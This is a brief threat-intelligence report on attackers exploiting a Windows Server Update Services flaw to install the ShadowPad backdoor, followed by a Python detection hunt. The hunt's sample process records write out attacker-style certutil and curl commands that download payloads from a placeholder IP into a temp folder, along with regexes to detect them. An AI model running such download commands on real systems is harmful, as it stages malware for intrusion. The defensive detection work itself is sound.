An exploitation campaign has emerged, targeting a recent RCE vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute the ShadowPad backdoor used by Chinese state-aligned APT groups. Immediate patching and security measures are crucial to prevent further breaches. #CVE202559287 #ShadowPad
Key points
- An active campaign exploits CVE-2025-59287 to compromise Windows Servers with WSUS enabled.
- Threat actors rapidly weaponized publicly released exploit code to distribute ShadowPad malware.
- Attackers used legitimate Windows utilities like certutil.exe and curl.exe to install the backdoor.
- ShadowPad operates behind legitimate executables and contains encrypted configuration data and modules.
- Organizations are advised to apply security updates, restrict WSUS access, and monitor for suspicious activity.
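As an added example (not code from the original brief or from any vendor tooling), the following hunt turns the certutil.exe/curl.exe pattern above into detection logic over constructed process-creation records, scoped to servers with the WSUS role; the record field names, the host inventory and the assumed WSUS parent processes (w3wp.exe, wsusservice.exe) are this example's assumptions, not facts from the brief.

```python
import re

# Constructed sample records in a simplified process-creation shape (Sysmon Event ID 1
# carries these fields among others); the dict keys are this example's own names.
EVENTS = [
    {"host": "wsus01", "parent": "w3wp.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://203.0.113.5/u.dat C:\\Windows\\Temp\\u.dat"},
    {"host": "wsus01", "parent": "cmd.exe", "image": "curl.exe",
     "cmd": "curl.exe -o C:\\Windows\\Temp\\svc.dll http://203.0.113.5/svc.dll"},
    {"host": "wsus01", "parent": "cmd.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -verify C:\\certs\\server.cer"},
    {"host": "fs01", "parent": "cmd.exe", "image": "curl.exe",
     "cmd": "curl.exe -o C:\\Windows\\Temp\\x.bin http://203.0.113.5/x.bin"},
]

WSUS_HOSTS = {"wsus01"}          # constructed inventory of servers with the WSUS role
# Assumption: WSUS serves its web endpoints from IIS, so an IIS worker or the WSUS
# service as parent of a download utility is worth calling out separately.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}

URL = re.compile(r"https?://", re.IGNORECASE)
CERTUTIL_FETCH = re.compile(r"-(urlcache|decode|decodehex)\b", re.IGNORECASE)

def classify(event):
    """Return the reasons an event is suspicious on a WSUS host ([] means not flagged)."""
    if event["host"] not in WSUS_HOSTS:
        return []                 # the brief scopes the hunt to WSUS-enabled servers
    image, cmd, parent = event["image"].lower(), event["cmd"], event["parent"].lower()
    reasons = []
    if image == "certutil.exe" and CERTUTIL_FETCH.search(cmd):
        reasons.append("certutil used to download or decode a payload")
    if image == "curl.exe" and URL.search(cmd):
        reasons.append("curl used to fetch a remote file")
    if reasons and parent in WSUS_PARENTS:
        reasons.append(f"spawned by WSUS service process {parent}")
    return reasons

def hunt(events):
    """Run classify over a batch and return (host, image, reasons) for every hit."""
    return [(e["host"], e["image"], r) for e in events if (r := classify(e))]

if __name__ == "__main__":
    for host, image, reasons in hunt(EVENTS):
        print(f"{host}: {image}: " + "; ".join(reasons))
```

The benign `certutil -verify` record and the non-WSUS host are left unflagged, so the rule keys on the download/decode usage the brief describes rather than on the utilities' mere presence.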